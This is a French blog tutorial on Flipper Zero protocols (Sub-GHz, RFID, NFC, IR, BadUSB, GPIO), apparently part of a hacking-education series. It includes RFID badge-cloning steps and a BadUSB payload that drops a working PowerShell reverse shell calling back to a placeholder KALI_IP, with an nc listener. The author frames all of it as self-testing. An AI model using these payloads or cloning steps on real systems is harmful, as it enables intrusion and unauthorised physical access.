Menu
À propos Services Parcours Travaillons ensemble
Circuit board close-up
Sécurité Mar 6, 2026 • 22 min de lecture

Flipper Zero Mastery: Every Protocol, Every Trick

Sub-GHz, RFID, NFC, BadUSB, GPIO—master every Flipper Zero capability with hands-on projects. Your work badge is less secure than you think.

Partager:
Lee Foropoulos

Lee Foropoulos

22 min de lecture

The Hacker's Path: Serie en 5 Parties

Partie 1: IntroductionPartie 2: Maitrise du FlipperPartie 3: Fondamentaux KaliPartie 4: ExploitationPartie 5: L'Audit Complet

Dans la Partie 1, vous avez fait vos premiers pas. Vous avez clone des telecommandes IR, scanne des cartes NFC, observe le spectre sub-GHz s'illuminer et tape "Hello World" avec BadUSB. Vous avez vu que la securite est souvent une illusion.

Maintenant on va en profondeur. A la fin de cet article, vous comprendrez chaque protocole majeur avec lequel votre Flipper Zero peut interagir, pas seulement comment les utiliser, mais pourquoi ils fonctionnent ainsi et ce que cela signifie pour la securite.

Avertissement: Vous allez decouvrir que plusieurs choses que vous pensiez securisees... ne le sont pas.

La Philosophie Flipper

Avant de plonger dans les protocoles, etablissons le bon etat d'esprit. Le Flipper Zero n'est pas un "appareil de piratage" au sens hollywoodien. C'est un outil d'apprentissage qui vous permet d'interagir avec des frequences radio et des protocoles materiels normalement invisibles.

Pensez-y comme une loupe pour les signaux sans fil. Les signaux ont toujours ete la. Vous ne pouviez simplement pas les voir. Maintenant vous le pouvez.

Cette distinction est importante car elle change votre approche de la securite. La plupart de la "securite" repose sur l'obscurite, l'hypothese que les attaquants ne sauront pas interagir avec un systeme. Votre Flipper elimine cette obscurite. Il vous montre exactement ce qui est transmis et recu. Et une fois que vous pouvez le voir, vous pouvez evaluer si une securite reelle existe.

La plupart de la "securite" repose sur l'obscurite, l'hypothese que les attaquants ne sauront pas interagir avec un systeme. Votre Flipper elimine cette obscurite.

Spoiler: Souvent, elle n'existe pas.

⚠️ Rappel: Vos Affaires Uniquement

Tout dans cet article sert a tester VOS PROPRES appareils, cartes et systemes. Les techniques fonctionnent sur les affaires de n'importe qui, c'est le but. Mais les utiliser sur des systemes que vous ne possedez pas est illegal. Testez votre propre securite. Decouvrez vos propres vulnerabilites. C'est le chemin.

Sub-GHz: Le Spectre Invisible

Les frequences radio sub-gigahertz sont partout. Votre porte de garage, cle de voiture, station meteo, sonnette sans fil, capteurs de pression des pneus, appareils domestiques intelligents, ils transmettent tous constamment dans des bandes de frequences inferieures a 1 GHz.

Pourquoi le sub-GHz? Les frequences plus basses voyagent plus loin et penetrent mieux les murs que les frequences plus elevees comme le WiFi (2.4/5 GHz). Cela les rend parfaites pour les appareils necessitant une communication fiable a distance sans besoin de ligne de vue.

Le Paysage des Frequences

Differentes regions utilisent differentes frequences en raison des reglementations:

  • 315 MHz: Amerique du Nord: anciennes portes de garage, cles de voiture
  • 390 MHz: Amerique du Nord: portes de garage, certains vehicules
  • 433.92 MHz: Mondial: stations meteo, capteurs, appareils europeens, nombreux produits IoT
  • 868 MHz: Europe: maison intelligente, LoRa, compteurs de services
  • 915 MHz: Ameriques: LoRa, maison intelligente, industriel

Avec le firmware Momentum, votre Flipper peut transmettre et recevoir sur toutes ces bandes quelle que soit votre position physique. Le firmware d'usine vous restreint aux frequences legales de votre region. Cela compte pour l'apprentissage: vous pourriez avoir des appareils fonctionnant sur des frequences "etrangeres".

Projet: Analysez Votre Porte de Garage

Temps: 15 minutes

Ce que vous apprendrez: La difference entre codes statiques et codes tournants, et pourquoi c'est important

Etapes:

  1. Naviguez vers Sub-GHz → Read
  2. Tenez-vous pres de votre garage (pas assez pres pour que la porte s'ouvre)
  3. Appuyez sur le bouton de votre telecommande de garage
  4. Regardez le Flipper capturer le signal
  5. Examinez ce qui a ete capture, regardez le protocole identifie

Ce que vous pourriez voir:

  • Princeton, Linear, Chamberlain (ancien): Codes statiques. Le meme code est transmis a chaque fois. Vulnerable aux attaques par rejeu.
  • KeeLoq, Security+ 2.0, Rolling Code: Codes tournants. Chaque transmission utilise un code different d'une sequence synchronisee. Ne peut pas etre simplement rejoue.

La realite: Si votre porte de garage utilise un code statique (beaucoup installees avant ~2015 le font), n'importe qui captant ce signal une fois peut le rejouer indefiniment. Votre garage est securise par l'hypothese que personne n'ecoute. Cette hypothese vient de se briser.

Les Codes Tournants Expliques

Les portes de garage et cles de voiture modernes utilisent des codes tournants (aussi appeles codes sautants). Voici comment ils fonctionnent:

  1. L'emetteur (votre telecommande) et le recepteur (votre garage) partagent une graine secrete et un algorithme
  2. Chaque pression de bouton genere le code suivant dans une sequence synchronisee
  3. Le recepteur accepte le code actuel OU n'importe lequel des ~256 codes suivants (pour gerer les pressions hors de portee)
  4. Une fois qu'un code est utilise, il est invalide pour toujours

Cela signifie que capturer et rejouer un signal de code tournant ne fonctionne pas: le temps de le rejouer, le code est deja invalide.

Pourquoi C'est Important

Les codes tournants ont ete inventes parce que le monde sub-GHz a decouvert que la securite par l'obscurite echoue. Quelqu'un a compris comment capturer et rejouer les signaux, alors l'industrie a du implementer une vraie securite cryptographique. Ce schema se repete dans chaque protocole que nous aborderons: la securite n'est ajoutee qu'apres que quelqu'un demontre la vulnerabilite.

Projet: Capturez les Donnees d'une Station Meteo

Temps: 10 minutes

Ce que vous apprendrez: Combien de donnees sont diffusees sans aucune protection

Etapes:

  1. Naviguez vers Sub-GHz → Read
  2. Attendez pres de n'importe quel capteur meteo sans fil (thermometre exterieur, pluviometre, etc.)
  3. La plupart transmettent toutes les 30-60 secondes
  4. Capturez la transmission
  5. Notez le protocole et les donnees decodees

Ce que vous trouverez: Temperature, humidite, etat de la batterie, ID du capteur, tout transmis en clair. Pas de chiffrement, pas d'authentification. N'importe quel recepteur accorde sur cette frequence obtient toutes les donnees. Maintenant pensez a quoi d'autre dans votre voisinage diffuse...

Concept d'ondes radio
Le spectre radio autour de vous est constamment actif avec des transmissions non chiffrees

RFID: Le Monde du 125kHz

Le RFID basse frequence (125kHz) est la technologie de carte de proximite plus ancienne et plus simple. Vous la trouverez dans les cartes de salle de sport, les anciennes cartes d'acces de bureaux, les parkings et les systemes d'entree d'immeubles.

Et c'est presque universellement terrible pour la securite.

Comment Fonctionne le RFID 125kHz

Ces cartes sont passives, elles n'ont pas de batterie. Quand vous en tenez une pres d'un lecteur, le champ electromagnetique du lecteur alimente la carte, et la carte transmet son numero d'ID. C'est tout. Pas de defi-reponse. Pas de chiffrement. Juste: "Je suis la carte numero 12345."

Le lecteur dit "ok" et accorde l'acces uniquement en connaissant ce numero d'ID.

Vous voyez le probleme.

Types de Cartes 125kHz Courants

  • EM4100: Extremement courante. Diffuse simplement un ID de 40 bits. Zero securite.
  • HID Prox: La carte d'acces d'entreprise la plus courante. Diffuse code d'installation + numero de carte. Zero securite.
  • Indala: Moins courante. Encodage different mais meme probleme: pas de securite.
  • AWID: Une autre variante. Meme faiblesse fondamentale.

Remarquez le schema? Toutes ces cartes diffusent simplement un ID. La "securite" est que quelqu'un aurait besoin d'equipement specialise pour lire cet ID. Votre Flipper est cet equipement.

Projet: Clonez Votre Carte de Salle de Sport

Temps: 5 minutes

Ce qu'il vous faut: Votre carte de salle de sport/piscine/appartement 125kHz, une carte vierge T5577 (1-2$ piece)

Etapes:

  1. Naviguez vers 125 kHz RFID → Read
  2. Tenez votre carte contre le dos du Flipper (ou se trouve l'antenne RFID)
  3. Attendez une lecture reussie, notez le type de carte et l'ID
  4. Sauvegardez la carte avec un nom reconnaissable
  5. Pour tester l'emulation: Saved → Select Card → Emulate
  6. Tenez le Flipper contre le lecteur de votre salle, ca devrait fonctionner de maniere identique a votre carte

Pour ecrire sur une T5577 vierge:

  1. Allez a votre carte sauvegardee
  2. Selectionnez Write
  3. Tenez une carte T5577 vierge contre le Flipper
  4. Attendez la confirmation d'ecriture
  5. Vous avez maintenant un clone physique

Pourquoi c'est important: Le modele de securite entier de ce systeme de controle d'acces vient de s'effondrer. N'importe qui pouvant s'approcher de votre carte pendant deux secondes peut la cloner. Pensez-y la prochaine fois que vous laissez votre sac de sport sans surveillance au vestiaire.

La T5577: Votre Carte Magique

La T5577 est une carte RFID reinscriptible qui peut emuler la plupart des types de cartes 125kHz. C'est comme un CD-R vierge pour cartes d'acces. Vous pouvez y ecrire n'importe quelles donnees de carte, et elle devient cette carte.

Achetez un lot de 10 pour les tests. Elles sont bon marche et incroyablement utiles pour comprendre a quel point toute cette technologie est faible. Vous pouvez ecrire les donnees d'une carte, la tester, puis ecrire des donnees differentes, le tout sur la meme carte physique.

Ce Que Cela Revele

La "securite" RFID 125kHz est du pur theatre. Ces systemes supposent que vous ne pouvez pas lire la carte, copier les donnees, ni les ecrire sur une autre carte. Les trois hypotheses sont fausses avec du materiel grand public. Si votre lieu de travail utilise des cartes HID Prox (la carte d'acces d'entreprise la plus courante), n'importe quel employe avec un Flipper peut cloner celle de n'importe quel autre employe. Laissez cela faire son chemin.

Point Cle

La securite RFID 125kHz est du pur theatre. Ces systemes supposent que vous ne pouvez pas lire, copier ou reecrire les donnees des cartes. Les trois hypotheses sont fausses avec du materiel grand public coutant moins de 200$.

Gros plan d'une carte de circuit imprime avec composants electroniques
Chaque protocole sans fil que votre Flipper touche revele des hypotheses sur la securite qui resistent rarement a l'examen

NFC: Le Monde du 13.56MHz

Le NFC haute frequence (13.56 MHz) est la generation plus recente. Il alimente le paiement sans contact, les cartes d'acces modernes, les systemes de transport, les cles d'hotel et le paiement par touche de votre telephone.

La bonne nouvelle: Certaines cartes NFC ont reellement une vraie securite.

La mauvaise nouvelle: Beaucoup non.

Types de Cartes NFC

  • MIFARE Classic: Extremement courant dans les cartes d'acces, transport, hotels. Utilise un chiffrement proprietaire cracke il y a des annees. Vulnerable.
  • MIFARE Ultralight: Cartes simples avec securite minimale. Souvent utilisees pour les billets de transport jetables.
  • NTAG: Courant dans les tags NFC pour l'automatisation. Generalement securite minimale.
  • MIFARE DESFire: Reellement securise. Utilise le chiffrement AES. Utilise dans les deploiements haute securite plus recents.
  • EMV (Cartes de Paiement): Votre carte de credit. Chiffrement fort, limites de transaction et detection de fraude.

Projet: Analysez Votre Badge de Travail

Temps: 10 minutes

Ce que vous apprendrez: Si votre lieu de travail a une vraie securite ou du theatre de securite

Etapes:

  1. Naviguez vers NFC → Read
  2. Tenez votre badge contre le dos du Flipper
  3. Attendez que la lecture soit complete
  4. Examinez ce que le Flipper vous dit

Interpretation des resultats:

  • MIFARE Classic 1K/4K: Votre badge utilise un chiffrement cracke. Avec du temps et les bons outils, il peut etre clone.
  • MIFARE Ultralight: Securite minimale. Souvent clonable.
  • MIFARE DESFire: Reellement securise. Vous verrez des donnees limitees.
  • Unknown/Locked: Pourrait etre proprietaire ou DESFire. Plus d'investigation necessaire.
18 ans
Depuis que le chiffrement MIFARE Classic a ete casse publiquement en 2008, et pourtant la plupart des badges d'entreprise s'appuient encore dessus.

Verification de realite: La plupart des badges d'entreprise sont encore MIFARE Classic. Le chiffrement a ete casse publiquement en 2008. Il y a dix-huit ans. Si votre badge indique MIFARE Classic, votre employeur fait tourner un systeme de securite que les cryptographes considerent comme risiblement faible.

Clonage d'UID vs Clonage Complet

Distinction importante: Le Flipper peut toujours lire et emuler l'UID (Identifiant Unique) d'une carte, le numero de serie. Certains systemes d'acces ne verifient que l'UID. Pour ces systemes, une simple emulation fonctionne.

Les meilleurs systemes verifient a la fois l'UID ET les donnees chiffrees stockees sur la carte. Pour ceux-ci, vous devriez aussi cloner les secteurs chiffres, possible pour MIFARE Classic (le chiffrement est casse) mais pas pour DESFire.

Projet: Analyse de Carte d'Hotel

Temps: 5 minutes (la prochaine fois que vous etes a l'hotel)

Ce que vous apprendrez: Comment fonctionne reellement la securite hoteliere

Etapes:

  1. Lisez votre carte d'hotel avec NFC → Read
  2. Notez le type de carte
  3. Regardez quelles donnees sont lisibles

Ce que vous trouverez typiquement: La plupart des cles d'hotel sont MIFARE Ultralight ou Classic. Certaines montrent le numero de chambre, la date de checkout ou d'autres metadonnees dans des secteurs lisibles. La "securite" est que les clients n'ont generalement pas de lecteurs NFC. Maintenant vous en avez un.

Cartes Magiques pour NFC

Comme la T5577 pour le 125kHz, il existe des cartes NFC "magiques" pour le 13.56MHz:

  • Gen1 (UID Modifiable): Peut ecrire un UID personnalise. Detectee par certains lecteurs comme "magique."
  • Gen2 (CUID): Meilleure compatibilite. Les changements d'UID persistent entre les cycles d'alimentation.
  • Gen3 (UFUID): Peut verrouiller l'UID apres ecriture, apparait comme carte normale.
  • Gen4 (Ultimate Magic): La plus flexible. Peut emuler plusieurs types de cartes.

Pour l'apprentissage, les cartes Gen2 sont le choix ideal: bon marche, largement compatibles et suffisamment bonnes pour la plupart des tests.

Infrarouge: Controle Complet

Vous avez deja cree des telecommandes IR dans la Partie 1. Allons plus loin.

Construire la Bibliotheque de Telecommandes Ultime

Le Flipper peut stocker des telecommandes IR illimitees. Mais apprendre chaque bouton individuellement est fastidieux. Meilleure approche: utilisez les bases de donnees communautaires.

Le firmware Momentum inclut IRDB, une base de donnees massive de telecommandes pre-capturees. Vous pouvez aussi telecharger des telecommandes depuis des depots GitHub et les ajouter a la carte SD de votre Flipper.

Projet: Construisez Votre Arsenal IR

Temps: 20 minutes

Etapes:

  1. Sur votre Flipper: Infrared → Universal Remotes
  2. Vous trouverez des telecommandes universelles pre-construites pour TV, climatisation, projecteurs, etc.
  3. Testez-les sur vos appareils
  4. Pour les appareils non couverts, utilisez Learn New Remote
  5. Organisez les telecommandes sauvegardees par piece ou type d'appareil

Coup de maitre: Creez des "telecommandes de piece" qui combinent tous les appareils IR d'un meme espace. Un seul fichier controle TV, barre de son, lumieres et climatisation.

Ce que vous apprenez: L'IR est universel et non protege. N'importe quel appareil avec un recepteur IR peut etre controle par n'importe quel appareil avec un emetteur IR. C'est intentionnel: l'IR a ete concu pour la commodite, pas la securite. Votre Flipper rend simplement cette commodite universelle.

Capture IR Brute

Certains appareils utilisent des protocoles IR non standard. Pour ceux-ci, le Flipper peut capturer le signal brut, la synchronisation exacte des impulsions on/off, et le rejouer parfaitement.

Naviguez vers Infrared → Learn New → Raw quand l'apprentissage standard ne reconnait pas un signal.

BadUSB: L'Alternative au Rubber Ducky

Dans la Partie 1, vous avez fait taper "Hello World" au Flipper. Maintenant on passe aux choses serieuses.

BadUSB (aussi connu comme attaques USB Rubber Ducky) exploite une faille fondamentale dans la facon dont les ordinateurs gerent les peripheriques USB: ils font implicitement confiance aux claviers. Quand vous branchez un appareil qui pretend etre un clavier, l'ordinateur accepte chaque frappe sans question.

Votre Flipper peut taper environ 1 000 caracteres par seconde. Plus rapide que n'importe quel humain. Assez rapide pour executer des attaques complexes avant que quiconque puisse reagir.

Les Fondamentaux de DuckyScript

Les payloads BadUSB utilisent DuckyScript, un langage de script simple. Commandes cles:

REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

Projet: Collecteur d'Informations Systeme

Temps: 15 minutes

Ce que ca fait: Ouvre PowerShell, collecte les infos systeme, sauvegarde dans un fichier (sur VOTRE machine)

REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

Ce que vous apprenez: En moins de 3 secondes d'acces physique, un attaquant pourrait collecter nom d'hote, nom d'utilisateur, domaine, adresses IP et version de l'OS. C'est de la reconnaissance. Imaginez quoi d'autre pourrait etre tape en ces 3 secondes.

Projet: Configuration de Shell Inverse

Temps: 30 minutes (incluant la configuration de Kali)

Ce que ca fait: Cree une connexion retour vers votre machine Kali (prepare pour la Partie 3)

Prerequis: Kali Linux en cours d'execution (VM c'est bien), connaitre l'IP de votre Kali

Sur Kali - Demarrer le listener:

nc -lvnp 4444

Payload BadUSB (cible Windows):

REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

Ce qui se passe: La machine cible ouvre une connexion PowerShell retour vers votre machine Kali. Vous avez maintenant un acces en ligne de commande a cette machine. C'est le coeur de comment acces physique + BadUSB = compromission complete. Nous explorerons cela davantage dans la Partie 3.

⚠️ Ces Payloads Sont Reels

Le payload de shell inverse ci-dessus fonctionne reellement. Utilisez-le UNIQUEMENT sur des machines que vous possedez pour tester. L'executer sur la machine de quelqu'un d'autre est un crime federal (acces non autorise + installation de porte derobee). Le but est de comprendre la menace, pas d'en creer une.

Payloads Amusants pour Demonstrations

Pour demontrer BadUSB a d'autres (sur leur machine avec permission), voici quelques payloads inoffensifs mais impressionnants:

REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER
REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11
REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: Expansion Materielle

Les broches GPIO (Entree/Sortie a Usage General) du Flipper vous permettent de connecter des modules externes et d'etendre les capacites. C'est ici que le Flipper se transforme d'outil portable en plateforme de developpement.

Modules Indispensables

  • WiFi Dev Board: Ajoute des capacites WiFi: capture de paquets, tests de deauth, attaques evil twin. Essentiel a partir de la Partie 3.
  • Antenne Externe CC1101: Etend considerablement la portee Sub-GHz. L'antenne interne fonctionne, mais l'externe est meilleure pour le travail serieux.
  • ESP32 Marauder: Transforme le Flipper en plateforme de piratage WiFi/Bluetooth. Capture les handshakes, execute des attaques.
  • ProtoBoard: Pour les projets personnalises et la connexion de votre propre materiel.

Projet: Configuration du WiFi Dev Board

Temps: 20 minutes

Ce qu'il vous faut: WiFi Dev Board (ESP32 officiel ou compatible)

Etapes:

  1. Flashez le firmware Marauder sur l'ESP32 (instructions sur github.com/justcallmekoko/ESP32Marauder)
  2. Connectez aux broches GPIO du Flipper
  3. Naviguez vers GPIO → ESP32 → Marauder
  4. Vous avez maintenant le scan WiFi, deauth et capture de paquets

Pourquoi c'est important: Le Flipper seul ne peut pas faire de WiFi: il manque le materiel radio adequat. Mais avec le dev board, vous pouvez scanner les reseaux, capturer les handshakes WPA et effectuer des attaques WiFi. Nous utiliserons cela de maniere extensive dans les Parties 3 et 4.

Fonctionnalites Avancees de Momentum

Si vous executez le firmware Momentum (vous devriez), voici des fonctionnalites a explorer:

  • Animations du Bureau: Purement cosmetiques, mais amusantes. Decouvrez les packs d'animations de la communaute.
  • Protocoles Etendus: Momentum ajoute le support de protocoles que le firmware d'usine n'inclut pas.
  • Hub d'Applications: Apps supplementaires au-dela de celles d'usine: jeux, outils, utilitaires specialises.
  • Packs d'Assets Personnalises: Changez toute l'apparence.

La vraie valeur reside dans les frequences debloquees et le support etendu des protocoles. Le firmware d'usine est intentionnellement limite pour la conformite legale/reglementaire. Momentum suppose que vous etes un adulte qui comprend les regles.

Ce Que Vous Avez Maitrise

Vous comprenez maintenant:

  • Sub-GHz: Comment les portes de garage, cles de voiture et capteurs communiquent, et pourquoi les codes tournants comptent
  • RFID 125kHz: Pourquoi les cartes de salle de sport et les anciens badges d'acces sont trivialement clonables
  • NFC 13.56MHz: La difference entre un chiffrement casse (MIFARE Classic) et une vraie securite (DESFire)
  • Infrarouge: Comment construire une bibliotheque de telecommandes universelles et capturer des signaux bruts
  • BadUSB: Pourquoi la confiance HID USB est une vulnerabilite fondamentale, et comment l'exploiter
  • GPIO: Comment s'etendre au WiFi, a la portee etendue et au materiel personnalise

Votre Flipper est maintenant une arme. Mais c'est un tournevis compare a Kali Linux, qui est un atelier entier. Il est temps de demarrer le vrai environnement de piratage.

The Hacker's Path

Une serie de 5 parties vous faisant passer de curieux a capable.

Partie 1: Introduction Partie 2: Maitrise du Flipper ✓ Partie 3: Fondamentaux Kali Partie 4: Exploitation Partie 5: Audit Complet

Checklist de la Partie 2

☐ Sub-GHz: Porte de garage analysee, codes tournants vs statiques compris

☐ RFID 125kHz: Cartes lues, au moins un clone teste

☐ NFC: Badge de travail analyse, type de carte identifie

☐ Infrarouge: Bibliotheque complete de telecommandes construite

☐ BadUSB: Payload d'info systeme testee, shell inverse compris

☐ GPIO: WiFi dev board pret pour la Partie 3

☐ Cartes Magiques: T5577 et/ou cartes magiques NFC acquises pour les tests

Plan d'Action Maitrise du Flipper 0/6

La Suite

Dans la Partie 3, nous quittons les capacites ciblees du Flipper et entrons dans l'environnement complet de test d'intrusion: Kali Linux.

Vous apprendrez:

  • Configurer votre laboratoire de piratage (installation et configuration de VM)
  • Reconnaissance reseau avec nmap: cartographier chaque appareil sur votre reseau
  • Reconnaissance sans fil: capturer les handshakes WiFi avec aircrack-ng
  • Reconnaissance web: decouvrir ce que votre routeur expose
  • Connecter les captures Flipper aux workflows Kali

Le Flipper vous a montre que des vulnerabilites existent. Kali vous aide a comprendre exactement a quel point elles sont profondes.

A la Partie 3.

How was this article?

Partager

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Ne manquez aucun article

Recevez une notification lors de la publication de nouveaux articles. Aucun courriel requis.

Vous verrez une banniere sur le site quand il y a un nouvel article, plus une notification navigateur si vous autorisez.

Notifications du navigateur uniquement. Pas de spam, pas de courriel.